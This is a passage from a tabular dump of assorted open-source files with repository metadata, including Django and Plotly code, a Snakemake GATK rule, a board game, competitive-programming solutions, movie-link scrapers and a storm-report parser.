blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e3b04d3b778413a7f94a95da22d271e008cd9655
|
02a0fff2786e5c24eb3f5aa505475705bf460196
|
/tests/test_openapi_schema.py
|
914f84912e37c7b5fb5c2630232f6b138132a2e5
|
[
"MIT"
] |
permissive
|
ismohamedi/django-ninja
|
5b63b0d45c0b22a36996e97f82fa289e91ccdffb
|
774f7f2af536dbedf527376f1ed6724b2456a54f
|
refs/heads/master
| 2023-03-12T22:30:16.991598
| 2021-02-19T14:55:30
| 2021-02-19T14:55:30
| 341,249,874
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,295
|
py
|
from typing import List
from unittest.mock import patch
from ninja import NinjaAPI, Schema
from django.test import Client, override_settings
from copy import copy
api = NinjaAPI()
class Payload(Schema):
i: int
f: float
class Response(Schema):
i: int
f: float
@api.post("/test", response=Response)
def method(request, data: Payload):
return data.dict()
@api.post("/test_list", response=List[Response])
def method_list(request, data: List[Payload]):
return []
def test_schema_views(client: Client):
assert client.get("/api/").status_code == 404
assert client.get("/api/docs").status_code == 200
assert client.get("/api/openapi.json").status_code == 200
def test_schema_views_no_INSTALLED_APPS(client: Client):
"Making sure that cdn and included js works fine"
from django.conf import settings
# removing ninja from settings:
INSTALLED_APPS = [i for i in settings.INSTALLED_APPS if i != "ninja"]
@override_settings(INSTALLED_APPS=INSTALLED_APPS)
def call_docs():
assert client.get("/api/docs").status_code == 200
call_docs()
def test_schema():
schema = api.get_openapi_schema()
from pprint import pprint
# --------------------------------------------------------------
method = schema["paths"]["/api/test"]["post"]
assert method["requestBody"] == {
"content": {
"application/json": {"schema": {"$ref": "#/components/schemas/Payload"}}
},
"required": True,
}
assert method["responses"] == {
200: {
"content": {
"application/json": {
"schema": {"$ref": "#/components/schemas/Response"}
}
},
"description": "OK",
}
}
# --------------------------------------------------------------
method_list = schema["paths"]["/api/test_list"]["post"]
assert method_list["requestBody"] == {
"content": {
"application/json": {
"schema": {
"items": {"$ref": "#/components/schemas/Payload"},
"title": "Data",
"type": "array",
}
}
},
"required": True,
}
assert method_list["responses"] == {
200: {
"content": {
"application/json": {
"schema": {
"items": {"$ref": "#/components/schemas/Response"},
"title": "Response",
"type": "array",
}
}
},
"description": "OK",
}
}
assert schema["components"]["schemas"] == {
"Payload": {
"properties": {
"f": {"title": "F", "type": "number"},
"i": {"title": "I", "type": "integer"},
},
"required": ["i", "f"],
"title": "Payload",
"type": "object",
},
"Response": {
"properties": {
"f": {"title": "F", "type": "number"},
"i": {"title": "I", "type": "integer"},
},
"required": ["i", "f"],
"title": "Response",
"type": "object",
},
}
|
[
"ppr.vitaly@gmail.com"
] |
ppr.vitaly@gmail.com
|
88d46720752a93211916300c547dbdb1f076b09f
|
0bb474290e13814c2498c086780da5096453da05
|
/diverta2019/A/main.py
|
9d653fcacf100b95d6cac66ff44625485aa86670
|
[] |
no_license
|
ddtkra/atcoder
|
49b6205bf1bf6a50106b4ae94d2206a324f278e0
|
eb57c144b5c2dbdd4abc432ecd8b1b3386244e30
|
refs/heads/master
| 2022-01-25T15:38:10.415959
| 2020-03-18T09:22:08
| 2020-03-18T09:22:08
| 208,825,724
| 1
| 0
| null | 2022-01-21T20:10:20
| 2019-09-16T14:51:01
|
Python
|
UTF-8
|
Python
| false
| false
| 560
|
py
|
#!.//usr/bin/env python3
import sys
def solve(N: int, K: int):
print(N-(K-1))
return
# Generated by 1.1.4 https://github.com/kyuridenamida/atcoder-tools (tips: You use the default template now. You can remove this line by using your custom template)
def main():
def iterate_tokens():
for line in sys.stdin:
for word in line.split():
yield word
tokens = iterate_tokens()
N = int(next(tokens)) # type: int
K = int(next(tokens)) # type: int
solve(N, K)
if __name__ == '__main__':
main()
|
[
"deritefully@gmail.com"
] |
deritefully@gmail.com
|
08787715e5c39a2256e078d7d66ba33fc723d3cb
|
b2b9cd537c4c6a216d9b1ee32008cc8e98552405
|
/Oriented_crawler/simple_thread/needheader.py
|
b7e1afc46eb45b39712ffaf80679f9f2e63e5943
|
[] |
no_license
|
liyanfeng0127/python2_bdrw
|
ce982813645294b884d73cd2bbc4de5a33fa2cd5
|
52eba0d67d30ed5ce23e01dde69db35a8ed65787
|
refs/heads/master
| 2021-05-08T06:50:53.916210
| 2017-10-12T10:41:05
| 2017-10-12T10:41:05
| 106,676,637
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 960
|
py
|
#-*—coding:utf8-*-
import requests
import re
#下面三行是编码转换的功能,大家现在不用关心。
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
#hea是我们自己构造的一个字典,里面保存了user-agent
#在页面中右键“审查元素”,刷新后“Network”,随便选择左边一个,然后选“Headers”,找'User-Agent'
hea = {'User-Agent':'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36'}
# html = requests.get('http://jp.tingroom.com/yuedu/yd300p/')
html = requests.get('http://jp.tingroom.com/yuedu/yd300p/',headers = hea)
html.encoding = 'utf-8' #这一行是将编码转为utf-8否则中文会显示乱码。
# print html.text
# title = re.findall('color:#666666;">(.*?)</span>',html.text,re.S)
# for each in title:
# print each
#
chinese = re.findall('color: #039;">(.*?)</a>',html.text,re.S)
for each in chinese:
print each
|
[
"yanfeng.li@lejent.com"
] |
yanfeng.li@lejent.com
|
c273bf8f309abad0d41156555a5b0f898dfb8ff1
|
6bf492920985e3741440ba53e1c7f8426b66ac1f
|
/snakemake_rules/rules/gatk/gatk_variant_indel_JEXL_filtration.smk
|
1bcc6f56005ae9290a2133ced08430e36f8d7e21
|
[
"MIT"
] |
permissive
|
ukaraoz/snakemake-rules
|
5b2ba7c9ec19d88b56067a46f66fd0c72e48c368
|
07e96afeb39307cdf35ecc8482dc1f8b62c120b9
|
refs/heads/master
| 2020-03-31T15:20:44.444006
| 2018-09-07T08:53:47
| 2018-09-07T08:53:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,512
|
smk
|
# -*- snakemake -*-
include: 'gatk.settings.smk'
include: 'gatk_select_indel_variants.smk'
config_default = {'gatk' :{'variant_indel_JEXL_filtration' : _gatk_config_rule_default.copy()}}
config_default['gatk']['variant_indel_JEXL_filtration'].update(
{
'expressions':
["QD < 2.0", "ReadPosRankSum < -20.0", "FS > 200.0",
"SOR > 10.0"]
})
update_config(config_default, config)
config = config_default
rule gatk_variant_indel_JEXL_filtration:
"""Run GATK VariantFiltration
Perform hard filtering using JEXL expressions
"""
wildcard_constraints:
suffix = "(.vcf|.vcf.gz)"
params: cmd = config['gatk']['cmd'] + " -T " + VARIANT_FILTRATION,
options = " ".join([
" ".join(["--filterName GATKStandard{e} --filterExpression \"{exp}\"".format(e=exp.split()[0], exp=exp) \
for exp in config['gatk']['variant_indel_JEXL_filtration']['expressions']])
]),
quote = "" if config['gatk']['cmd'].startswith("gatk") else "",
runtime = config['gatk']['variant_indel_JEXL_filtration']['runtime']
input: vcf = "{prefix}{suffix}", ref = config['gatk']['variant_indel_JEXL_filtration']['ref']
output: vcf = "{prefix}.filteredINDEL{suffix}"
threads: config['gatk']['variant_indel_JEXL_filtration']['threads']
conda: "env.yaml"
shell: "{params.cmd} {params.quote}{params.options}{params.quote} -R {input.ref} --variant {input.vcf} --out {output.vcf}"
|
[
"per.unneberg@scilifelab.se"
] |
per.unneberg@scilifelab.se
|
fb291cab56eb80122ba5cbe060bfae906dc43ad0
|
6baac3bec174cbb3542d844b34cec3870633e7bf
|
/red_blue.py
|
f1ecc21136b6b888b03b5d416a9b4635190f2a47
|
[] |
no_license
|
tyday/RedBlue
|
abcbdbe65fe13ae468cffaf7d9b1b5b1aba34a0f
|
4e54d3e4ca67981cc32ba659ec8f0b5aed93b291
|
refs/heads/main
| 2023-01-07T19:26:40.147228
| 2020-11-07T01:32:50
| 2020-11-07T01:32:50
| 310,451,484
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,067
|
py
|
# a program to play red vs blue
# It's played on a board. Each side gets to choose an open
# square per side. Selecting a square turns each adjacent square
# your color. The game ends when all squares are filled.
# the winner is the side with the most squares
# created from this idea
# https://red-blue.herokuapp.com/
# https://github.com/akulchhillar/Red-Blue
# https://www.reddit.com/r/flask/comments/jkdxh0/hi_all_here_is_a_board_game_for_two_players_made/
# Flow:
# Display Status
# Wait for turn
# Evaluate/Update Board
# Check for win
# Save Game
from random import choice
from enum import Enum
class Cell_Value(Enum):
RED = -1
BLUE = 1
NEUTRAL = 0
class Red_Blue():
def __init__(self, width = 8, height = 8,
display_status = True,
red_player = 'human',
blue_player = 'human'):
player_type = {
'human': self.get_human_move,
'random': self.get_random_computer_move
}
self.board_width = 8
self.board = [Cell_Value.NEUTRAL] * width * height
self.game_over = False
self.player = {
Cell_Value.BLUE: player_type[blue_player],
Cell_Value.RED: player_type[red_player]
}
# self.red_player = red_player
# self.blue_player = blue_player
self.display_status = display_status
self.history = []
self.turn = Cell_Value.RED
def get_available_moves(self):
available_moves = []
for i in range(len(self.board)):
if self.board[i].name == 'NEUTRAL':
available_moves.append(i)
return available_moves
def get_random_move(self):
available_moves = self.get_available_moves()
random_selection = choice(available_moves)
return random_selection
def check_if_move_is_valid(self,move):
if int(move) in self.get_available_moves():
return True
return False
def get_adjacent_cells(self, cell):
adjacent_cells = []
# Above
if cell - self.board_width >= 0:
adjacent_cells.append(cell-self.board_width)
# Below
if cell + self.board_width < len(self.board):
adjacent_cells.append(cell+self.board_width)
# Left
if cell % self.board_width != 0:
adjacent_cells.append(cell-1)
# Right
if (cell+1)%self.board_width !=0:
adjacent_cells.append(cell+1)
return adjacent_cells
def get_center_cell(self, data):
# used if we only get the data of cells flipped
# but not selected cell
for cell in data:
cell_adjacents = self.get_adjacent_cells(cell)
cell_overlap = [c for c in cell_adjacents if c in data]
if len(cell_overlap) > 1:
return cell
return None
def player_action(self):
self.player[self.turn]()
def get_human_move(self):
move = None
while move not in self.get_available_moves():
move = input("Select cell: ")
if move == 'q':
break
try:
move = int(move)
except:
print('Selection must be an integer.')
if move not in self.get_available_moves():
print('Invalid move... please select again')
self.move(move)
def get_random_computer_move(self):
move = self.get_random_move()
self.move(move)
def change_player(self):
if self.turn == Cell_Value.RED:
self.turn = Cell_Value.BLUE
else:
self.turn = Cell_Value.RED
def show_status(self):
r,b = self.red_blue_score()
print(f'Turn: {self.turn.name} -- Score RED: {r}, BLUE: {b}')
def show_board(self):
row = ''
for i, cell in enumerate(self.board):
if cell == Cell_Value.RED:
row += ' RR '
elif cell == Cell_Value.BLUE:
row += ' BB '
else:
row += f' {i:2d} '
if (i+1) % self.board_width == 0:
# we've reached the end of the row.
print(row)
print()
row = ''
def move(self, move):
all_cells = self.get_adjacent_cells(move)
all_cells.append(move)
for cell in all_cells:
self.board[cell] = self.turn
board = [cell.value for cell in self.board]
self.history.append([self.turn.value, move, board])
def red_blue_score(self):
red = len([cell for cell in self.board if cell.name == Cell_Value.RED.name])
blue = len([cell for cell in self.board if cell.name == Cell_Value.BLUE.name])
return red, blue
def check_game_status(self):
if len(self.get_available_moves()) == 0:
# game is over,
# so append the winner of the game to the game history
self.game_over = True
print('Winner!!!')
red_cells = [cell for cell in self.board if cell.name == Cell_Value.RED.name]
blue_cells = [cell for cell in self.board if cell.name == Cell_Value.BLUE.name]
winner = 0
if len(red_cells) > len(blue_cells):
winner = Cell_Value.RED.value
elif len(blue_cells) > len(red_cells):
winner = Cell_Value.BLUE.value
else:
winner = Cell_Value.NEUTRAL.value
for item in self.history:
item.insert(0,winner)
def play_game(self):
while self.game_over is False:
if self.display_status:
self.show_status()
self.show_board()
self.player_action()
self.change_player()
self.check_game_status()
print(self.history)
print(self.show_status())
if __name__=='__main__':
game = Red_Blue(display_status=False, red_player='random', blue_player='random')
game.play_game()
|
[
"tyrday@gmail.com"
] |
tyrday@gmail.com
|
c8a08a597f157e4b39c207a5d7d93895a325beea
|
d93fe0484fc3b32c8fd9b33cc66cfd636a148ec4
|
/AtCoder/ARC-C/004probC.py
|
2dc3017bd13cc5dfe8e5d05bb87bb841727be9e2
|
[] |
no_license
|
wattaihei/ProgrammingContest
|
0d34f42f60fa6693e04c933c978527ffaddceda7
|
c26de8d42790651aaee56df0956e0b206d1cceb4
|
refs/heads/master
| 2023-04-22T19:43:43.394907
| 2021-05-02T13:05:21
| 2021-05-02T13:05:21
| 264,400,706
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 435
|
py
|
import sys
input = sys.stdin.readline
from fractions import gcd
X, Y = map(int, input().split("/"))
g = gcd(X, Y)
x = X//g
y = Y//g
n_min = (2*x-y)//(y**2)
n_max = (2*x+y)//(y**2) + 1
ans = []
for n in range(n_min, n_max+1):
if n <= 0: continue
N = y*n
M = N*(N+1)//2 - x*n
if 0 < M <= N:
ans.append((N, M))
if not ans:
print("Impossible")
else:
print("\n".join([str(a)+" "+str(b) for a, b in ans]))
|
[
"wattaihei.rapyuta@gmail.com"
] |
wattaihei.rapyuta@gmail.com
|
16fe148351f93eee112d2d7bab5ba1c951af710b
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/ncLp4ZXvz4x4oEHYh_13.py
|
08497f878c8c64402f937ecba818958c517619e3
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 674
|
py
|
"""
Given two unique integer lists `a` and `b`, and an integer target value `v`,
create a function to determine whether there is a pair of numbers that add up
to the target value `v`, where one number comes from one list `a` and the
other comes from the second list `b`.
Return `True` if there is a pair that adds up to the target value and `False`
otherwise.
### Examples
sum_of_two([1, 2], [4, 5, 6], 5) ➞ True
sum_of_two([1, 2], [4, 5, 6], 8) ➞ True
sum_of_two([1, 2], [4, 5, 6], 3) ➞ False
sum_of_two([1, 2], [4, 5, 6], 9) ➞ False
### Notes
N/A
"""
def sum_of_two(a, b, v):
return any([i+j==v for i in a for j in b])
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
21326e3552bdb8a7d4600a442d82b4a5930e105e
|
5dcdc5720f59280e6e22e78534dc565e9b299048
|
/数学/Angles of a Clock.py
|
6883e79b5bbaa586ecf7db879518fbfeaa58e64d
|
[] |
no_license
|
Stella2019/10-24
|
4fc944ba397d8f9494f4fc7ceead3065b4572a55
|
d62572831235e8e608f259aa7b3608ae6752a64a
|
refs/heads/main
| 2023-01-01T12:46:06.021044
| 2020-10-24T20:53:12
| 2020-10-24T20:53:12
| 306,967,300
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 232
|
py
|
def calcAngle(h, m):
hour_angle = (360 / (12 * 60.0)) * (h * 60 + m)
min_angle = 360 / 60.0 * m
angle = abs(hour_angle - min_angle)
return min(angle, 360 - angle)
print(calcAngle(3, 15))
# 7.50
print(calcAngle(3, 00))
# 90
|
[
"noreply@github.com"
] |
Stella2019.noreply@github.com
|
b82cce8fe7e0e430c2cb38d742aab8c0b680be5f
|
a46d135ba8fd7bd40f0b7d7a96c72be446025719
|
/packages/python/plotly/plotly/validators/bar/_yperiod0.py
|
225b424a1703b373d93e4772e32dd4b730f629cb
|
[
"MIT"
] |
permissive
|
hugovk/plotly.py
|
5e763fe96f225d964c4fcd1dea79dbefa50b4692
|
cfad7862594b35965c0e000813bd7805e8494a5b
|
refs/heads/master
| 2022-05-10T12:17:38.797994
| 2021-12-21T03:49:19
| 2021-12-21T03:49:19
| 234,146,634
| 0
| 0
|
MIT
| 2020-01-15T18:33:43
| 2020-01-15T18:33:41
| null |
UTF-8
|
Python
| false
| false
| 392
|
py
|
import _plotly_utils.basevalidators
class Yperiod0Validator(_plotly_utils.basevalidators.AnyValidator):
def __init__(self, plotly_name="yperiod0", parent_name="bar", **kwargs):
super(Yperiod0Validator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc"),
**kwargs
)
|
[
"nicolas@plot.ly"
] |
nicolas@plot.ly
|
6eeba5437fbc07d0f6fd5a93ffba6c90b5d28a83
|
1751ea577fb63c0e34e469193c0de0519fa5d32b
|
/manage.py
|
43213755618f352dfdc6090a6f0056cb9895fc95
|
[] |
no_license
|
zakuro9715/uragf
|
a987f0ae51c15496e48214eaffc5440a1dbc641e
|
060658d2dc5a5a15bdd5f2301a60d050b38ddf3d
|
refs/heads/master
| 2021-01-10T00:57:47.417420
| 2016-04-03T05:26:13
| 2016-04-03T05:26:13
| 36,533,479
| 0
| 2
| null | 2015-06-23T23:30:42
| 2015-05-29T23:01:38
|
Python
|
UTF-8
|
Python
| false
| false
| 248
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "uragf.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
[
"zakuro@yuzakuro.me"
] |
zakuro@yuzakuro.me
|
522c6512806730f37abd8e337751cf53e361a3fb
|
0566cf76b456518875edecece15e763a36a4795f
|
/scrapers/1channelmovie_com.py
|
9fdd83bce3433ea161b1b921f96d70c7f22a427f
|
[] |
no_license
|
theclonedude/Scraping_BeautifulSoup_phantomjs
|
684b1f7a993e0d2555daa7a5455cf19bd29b0b1b
|
faf653feae46c21a72d13b2123cdebdb2f7c05d8
|
refs/heads/master
| 2023-03-16T19:36:14.867361
| 2018-06-14T14:21:02
| 2018-06-14T14:21:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,172
|
py
|
import re
from sandcrawler.scraper import ScraperBase, SimpleScraperBase, ScraperFetchException
class OneChannelMovieCom(SimpleScraperBase):
BASE_URL = 'http://www.1channelmovie.com'
OTHERS_URLS = ['http://1channelmovie.com', 'http://www.1channelmovie.com']
# it seems we can merge this with PrimewireAg scraper
def setup(self):
self.register_scraper_type(ScraperBase.SCRAPER_TYPE_OSP)
self.search_term_language = "eng"
self.register_media(ScraperBase.MEDIA_TYPE_TV)
self.register_media(ScraperBase.MEDIA_TYPE_FILM)
self.register_url(
ScraperBase.URL_TYPE_SEARCH,
self.BASE_URL,
)
self.register_url(
ScraperBase.URL_TYPE_LISTING,
self.BASE_URL)
def _fetch_next_button(self, soup):
link = soup.select_one('div.pagination a[rel="next"]')
if link:
return link.href
else:
return None
def _get_search_url(self, search_term, media_type):
return self.BASE_URL + '/search/%s/' % \
self.util.quote(search_term)
def search(self, search_term, media_type, **extra):
search_url = self._get_search_url(search_term, media_type)
for soup in self.soup_each([search_url]):
self._parse_search_page(soup)
def _parse_search_page(self, soup):
results = soup.select('div.index_item a')
if not results or len(results) == 0:
return self.submit_search_no_results()
for link in results:
# Skip extra, not useful links.
if re.match('Watch (.*) for FREE', link['title']):
continue
self.submit_search_result(
link_url=link['href'],
link_title=link['title']
)
next_button = self._fetch_next_button(soup)
if next_button and self.can_fetch_next():
soup = self.get_soup(next_button)
self._parse_search_page(soup)
def parse(self, parse_url, **extra):
for soup in self.soup_each([parse_url, ]):
# Movie pages have the versions linked directly off the main page.
self._parse_versionlinks(soup)
# TV you need to go a page deep (ie each episode)
for link in soup.select('div.tv_episode_item a'):
try:
episode_soup = self.get_soup(link['href'])
self._parse_versionlinks(episode_soup)
except Exception as e:
self.log.exception(e)
def _parse_versionlinks(self, soup):
for link in soup.select('span.movie_version_link a'):
# Follow the link to get the 'real' url.
url = link['href']
if 'marketing' in url:
continue
if not url.startswith('http'):
url = self.BASE_URL + url
try:
followed_link = self.get(url)
except Exception:
self.log.warning('Failed to follow link.')
else:
self.submit_parse_result(index_page_title=soup.title.text.strip(),
link_url=followed_link.url,
link_name=link['title']
)
class VodlyTo(OneChannelMovieCom):
BASE_URL = 'http://vodly.cr'
OTHER_URLS = ['http://vodly.to', ]
SINGLE_RESULTS_PAGE = True
#def setup(self):
# raise NotImplementedError('The website is with "Be right back" message on the front page')
def get(self, url, **kwargs):
return super(self.__class__, self).get(
url, allowed_errors_codes=[404, 403], **kwargs)
def _get_search_url(self, search_term, media_type):
return self.BASE_URL + '/movies/filter?genre=&year=&actor={}&director=&submit='.format(search_term)
def _parse_search_page(self, soup):
info_box = soup.select_one('h3[class="comment-reply-title"]')
if info_box and info_box.text.find("No movies were found based on the above search") > -1:
return self.submit_search_no_results()
found = 0
for link in soup.select('div.item-img a'):
if link:
self.submit_search_result(
link_url=link.href,
link_title=link.text,
image=self.util.find_image_src_or_none(link, 'img')
)
found = 1
if found == 0:
self.submit_search_no_results()
def _follow_link(self, link):
soup = self.get_soup(link)
result = soup.select_one('div.video-section a')
return result and result.href or None
def parse(self, parse_url, **extra):
for soup in self.soup_each([parse_url, ]):
title = soup.select_one('h1').text
for link in soup.select('a.external_link'):
url = self._follow_link(link.href)
if url:
self.submit_parse_result(
link_url=url,
link_title=title,
)
|
[
"stryokka@gmail.com"
] |
stryokka@gmail.com
|
fa5e3a6fc50b302b03a1dc690503f0ab53d00c0e
|
bb45e66a1b438cb9bb8eb2cdcd54d82287338fdf
|
/pyiem/nws/products/lsr.py
|
b4e889ea5e7190bcf1cbdd8fe991683969be9c86
|
[] |
no_license
|
aarande/pyIEM
|
685c50b6af3e2cc936e434d7152e67f4ffc1e0ed
|
e9467710e6908ca147ebe88c2ee3559484503fe2
|
refs/heads/master
| 2021-01-21T00:02:22.123066
| 2015-02-27T15:27:45
| 2015-02-27T15:27:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,383
|
py
|
'''
Local Storm Report
'''
# Stand Library Imports
import datetime
import re
# Third party
import pytz
from shapely.geometry import Point as ShapelyPoint
SPLITTER = re.compile(r"(^[0-9].+?\n^[0-9].+?\n)((?:.*?\n)+?)(?=^[0-9]|$)",
re.MULTILINE)
from pyiem.nws.product import TextProduct, TextProductException
from pyiem import reference
from pyiem.nws.lsr import LSR
class LSRProductException(TextProductException):
''' Something we can raise when bad things happen! '''
pass
class LSRProduct(TextProduct):
''' Represents a text product of the LSR variety '''
def __init__(self, text, utcnow=None):
''' constructor '''
self.lsrs = []
self.duplicates = 0
TextProduct.__init__(self, text, utcnow=utcnow)
def get_temporal_domain(self):
''' Return the min and max timestamps of lsrs '''
valids = []
for lsr in self.lsrs:
valids.append( lsr.valid )
if len(valids) == 0:
return None, None
return min(valids), max(valids)
def is_summary(self):
''' Returns is this LSR is a summary or not '''
return self.unixtext.find("...SUMMARY") > 0
def get_url(self, baseuri):
''' Get the URL of this product '''
min_time, max_time = self.get_temporal_domain()
wfo = self.source[1:]
return "%s#%s/%s/%s" % (baseuri, wfo,
min_time.strftime("%Y%m%d%H%M"),
max_time.strftime("%Y%m%d%H%M") )
def get_jabbers(self, uri):
''' return a text and html variant for Jabber stuff '''
res = []
wfo = self.source[1:]
url = self.get_url(uri)
for mylsr in self.lsrs:
if mylsr.duplicate:
continue
time_fmt = "%-I:%M %p %Z"
url = "%s#%s/%s/%s" % (uri, mylsr.wfo,
mylsr.utcvalid.strftime("%Y%m%d%H%M"),
mylsr.utcvalid.strftime("%Y%m%d%H%M") )
if mylsr.valid.day != self.utcnow.day:
time_fmt = "%-d %b, %-I:%M %p %Z"
xtra = {
'product_id': self.get_product_id(),
'channels': "LSR%s,LSR.ALL,LSR.%s" % (mylsr.wfo,
mylsr.typetext.replace(" ", "_")),
'geometry': 'POINT(%s %s)' % (mylsr.get_lon(), mylsr.get_lat()),
'ptype' : mylsr.get_dbtype(),
'valid' : mylsr.utcvalid.strftime("%Y%m%dT%H:%M:00"),
'category' : 'LSR',
'twitter' : "%s %s" % (mylsr.tweet(), url),
'lat': str(mylsr.get_lat()),
'long': str(mylsr.get_lon()),
}
html = ("<p>%s [%s Co, %s] %s <a href=\"%s\">reports %s</a> at "
+"%s -- %s</p>") % (
_mylowercase(mylsr.city), mylsr.county.title(), mylsr.state, mylsr.source,
url, mylsr.mag_string(),
mylsr.valid.strftime(time_fmt), mylsr.remark)
plain = "%s [%s Co, %s] %s reports %s at %s -- %s %s" % (
_mylowercase(mylsr.city), mylsr.county.title(),
mylsr.state, mylsr.source,
mylsr.mag_string(),
mylsr.valid.strftime(time_fmt), mylsr.remark, url)
res.append( [plain, html, xtra])
if self.is_summary():
extra_text = ""
if self.duplicates > 0:
extra_text = (", %s out of %s reports were previously "
+"sent and not repeated here.") % (self.duplicates,
len(self.lsrs))
text = "%s: %s issues Summary Local Storm Report %s %s" % (
wfo, wfo, extra_text, url)
html = ("<p>%s issues "
+"<a href='%s'>Summary Local Storm Report</a>%s</p>") % (
wfo, url, extra_text)
xtra = {
'product_id': self.get_product_id(),
'channels': 'LSR%s' % (wfo,),
}
res.append([text, html, xtra] )
return res
def _mylowercase(text):
''' Specialized lowercase function '''
tokens = text.split()
for i,t in enumerate(tokens):
if len(t) > 3:
tokens[i] = t.title()
elif t in ['N', 'NNE', 'NNW', 'NE',
'E', 'ENE', 'ESE', 'SE',
'S', 'SSE', 'SSW', 'SW',
'W', 'WSW', 'WNW', 'NW']:
continue
return " ".join(tokens)
def parse_lsr(text):
''' Emit a LSR object based on this text!
0914 PM HAIL SHAW 33.60N 90.77W
04/29/2005 1.00 INCH BOLIVAR MS EMERGENCY MNGR
'''
lines = text.split("\n")
if len(lines) < 2:
raise LSRProductException("LSR text is too short |%s|" % (
text.replace("\n", "<NL>"),))
lsr = LSR()
lsr.text = text
tokens = lines[0].split()
h12 = tokens[0][:-2]
mm = tokens[0][-2:]
ampm = tokens[1]
dstr = "%s:%s %s %s" % (h12, mm, ampm, lines[1][:10])
lsr.valid = datetime.datetime.strptime(dstr, "%I:%M %p %m/%d/%Y")
lsr.typetext = lines[0][12:29].strip().upper()
lsr.city = lines[0][29:53].strip()
tokens = lines[0][53:].strip().split()
lat = float(tokens[0][:-1])
lon = 0 - float(tokens[1][:-1])
lsr.geometry = ShapelyPoint((lon,lat))
lsr.consume_magnitude( lines[1][12:29].strip() )
lsr.county = lines[1][29:48].strip()
lsr.state = lines[1][48:50]
lsr.source = lines[1][53:].strip()
if len(lines) > 2:
meat = " ".join( lines[2:] ).strip()
lsr.remark = " ".join( meat.split())
return lsr
def parser(text, utcnow=None, ugc_provider=None, nwsli_provider=None):
''' Helper function that actually converts the raw text and emits an
LSRProduct instance or returns an exception'''
prod = LSRProduct(text, utcnow)
for match in SPLITTER.finditer(prod.unixtext):
lsr = parse_lsr("".join(match.groups()))
lsr.wfo = prod.source[1:]
lsr.assign_timezone( prod.tz, prod.z )
prod.lsrs.append( lsr )
return prod
|
[
"akrherz@iastate.edu"
] |
akrherz@iastate.edu
|
8083e994eaa7d834c3bfa85f4db0f2406e2291d2
|
709bd5f2ecc69a340da85f6aed67af4d0603177e
|
/saleor/account/backends/google.py
|
6c8e205b957de89d66aa8f067b3271926f386c40
|
[
"BSD-3-Clause"
] |
permissive
|
Kenstogram/opensale
|
41c869ee004d195bd191a1a28bf582cc6fbb3c00
|
5102f461fa90f2eeb13b9a0a94ef9cb86bd3a3ba
|
refs/heads/master
| 2022-12-15T02:48:48.810025
| 2020-03-10T02:55:10
| 2020-03-10T02:55:10
| 163,656,395
| 8
| 0
|
BSD-3-Clause
| 2022-12-08T01:31:09
| 2018-12-31T09:30:41
|
Python
|
UTF-8
|
Python
| false
| false
| 222
|
py
|
from social_core.backends.google import GoogleOAuth2
from . import BaseBackend
from ...site import AuthenticationBackends
class CustomGoogleOAuth2(BaseBackend, GoogleOAuth2):
DB_NAME = AuthenticationBackends.GOOGLE
|
[
"Kenstogram@gmail.com"
] |
Kenstogram@gmail.com
|
56c555025b131f114b3d96bcf46ab5d8b4e5c909
|
4252102a1946b2ba06d3fa914891ec7f73570287
|
/pylearn2/scripts/jobman/tester.py
|
6c7685167c84cb7e7757a0b616da9bcc0868a95a
|
[] |
no_license
|
lpigou/chalearn2014
|
21d487f314c4836dd1631943e20f7ab908226771
|
73b99cdbdb609fecff3cf85e500c1f1bfd589930
|
refs/heads/master
| 2020-05-17T00:08:11.764642
| 2014-09-24T14:42:00
| 2014-09-24T14:42:00
| 24,418,815
| 2
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,032
|
py
|
"""
This an example script inserting a pylearn2 yaml code into a jobman database.
The code below defines a yaml template string in state.yaml_template,
